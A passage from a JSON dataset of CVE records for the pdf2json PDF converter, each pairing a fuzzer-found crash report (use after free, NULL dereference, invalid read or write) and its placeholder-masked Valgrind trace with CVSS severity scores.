        "description": "Segmentation fault on APITAG Hi, Our fuzzer found a crash due to an invalid read on the function APITAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FB6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG fd NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG FD NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FB6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19467",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/28",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/28",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-28T05:41:37Z",
        "description": "Segmentation fault (use after free) on APITAG Hi, Our fuzzer found a crash due to an Use After Free bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG c NUMBERTAG is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2F NUMBERTAG B: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D: APITAG (in PATHTAG NUMBERTAG Block was alloc'd at NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG ff NUMBERTAG c is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG FF NUMBERTAG C NUMBERTAG at NUMBERTAG B: APITAG short , int , unsigned char ) (in PATHTAG NUMBERTAG by NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C8: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG BE: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19468",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/29",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/29",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-28T05:57:15Z",
        "description": "Segmentation fault (NULL pointer dereference) on APITAG Hi, Our fuzzer found a crash due to a NULL pointer dereference bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: May not be a PDF file (continuing anyway) Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character ')' Error: Unterminated string Error: Bad image parameters NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG ECFA: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG ECFA: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG B1D: APITAG , Object , int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19469",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/30",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/30",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-28T06:47:45Z",
        "description": "Segmentation fault on APITAG Hi, Our fuzzer found a crash due to an invalid write on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error NUMBERTAG Illegal character ')' Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG D2D: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG E: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG b1b NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG CF NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Conditional jump or move depends on uninitialised value(s NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG , APITAG , int , int ) (in PATHTAG NUMBERTAG by NUMBERTAG CF: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FB6: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DF: APITAG , Lexer , int) (in PATHTAG NUMBERTAG by NUMBERTAG F8: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Error NUMBERTAG Bad Huffman code in DCT stream NUMBERTAG Use of uninitialised value of size NUMBERTAG at NUMBERTAG ACFE: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG ACFE: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG ACFE: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG Use track origins=yes to see where uninitialised values come from NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19470",
        "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/31",
        "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/31",
        "Repo_new": "flexpaper/pdf2json",
        "Issue_Created_At": "2019-05-28T08:53:18Z",
        "description": "Segmentation fault (NULL pointer dereference) on APITAG Hi, Our fuzzer found a crash due to a NULL pointer dereference bug on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error NUMBERTAG Badly formatted number Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DF: APITAG , Lexer , int) (in PATHTAG NUMBERTAG by NUMBERTAG F8: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG DF: APITAG , Lexer , int) (in PATHTAG NUMBERTAG by NUMBERTAG F8: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with 